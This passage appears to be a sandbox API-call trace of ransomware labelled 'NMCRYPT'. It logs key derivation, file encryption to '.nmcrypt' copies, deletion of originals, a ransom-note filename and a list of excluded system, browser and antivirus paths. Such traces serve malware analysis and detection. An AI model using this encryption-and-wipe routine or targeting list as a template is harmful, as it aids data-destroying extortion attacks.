hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.391] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.391] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.391] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0155.391] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.391] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad638) returned 1 [0155.391] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0155.391] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0155.391] wcslen (_String="\\\\?\\") returned 0x4 [0155.391] CryptDuplicateKey (in: hKey=0x9ad638, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad5b8) returned 1 [0155.391] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0155.392] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0155.392] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=215) returned 1 [0155.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0155.392] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0xd7, lpOverlapped=0x0) returned 1 [0155.393] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xd7, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xe0) returned 1 [0155.393] GetLastError () returned 0x0 [0155.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0xe0, lpOverlapped=0x0) returned 1 [0155.434] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0155.434] WriteFile (in: hFile=0x588, lpBuffer=0x2901230*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0155.434] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml")) returned 0x20 [0155.434] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml", dwFileAttributes=0x20) returned 0 [0155.435] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml") returned 1 [0155.435] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml")) returned 0 [0155.435] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" [0155.435] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 1 [0155.435] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD24B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd24b.tmp")) returned 0xd24b [0155.435] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD24B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd24b.tmp"), dwFlags=0x1) returned 0 [0155.436] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD24B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd24b.tmp")) returned 1 [0155.436] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0155.436] wcslen (_String="OK") returned 0x2 [0155.436] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.436] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.436] CryptDestroyKey (hKey=0x9ad638) returned 1 [0155.436] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0155.436] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0155.436] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.436] wcscmp (_String1="osknav", _String2=".") returned 1 [0155.436] wcscmp (_String1="osknav", _String2="..") returned 1 [0155.436] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.436] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*NMCRYPT") returned 0 [0155.436] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*Recovers your files.html") returned 0 [0155.436] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*.exe") returned 0 [0155.436] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*.dll") returned 0 [0155.436] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*.lnk") returned 0 [0155.436] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*.bat") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*.ini") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*.msi") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*.scf") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*pagefile.sys*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*NTUSER.DAT*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*AppData*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*\\winrar\\*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*\\java\\*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*\\windows\\*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*\\ESET\\*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*\\AVG\\*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*\\AVIRA\\*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*Atheros*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*Realtek*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*bootmgr*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*boot*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*boot*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*CONFIG.SYS*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*IO.SYS*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*MSDOS.SYS*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*NTDETECT.COM*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*ntldr*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*chrome*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*opera*") returned 0 [0155.437] PathMatchSpecW (pszFile="osknav.xml", pszSpec="*firefox*") returned 0 [0155.437] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml", pszSpec="*") returned 1 [0155.437] strlen (_Str="NMoreira") returned 0x8 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 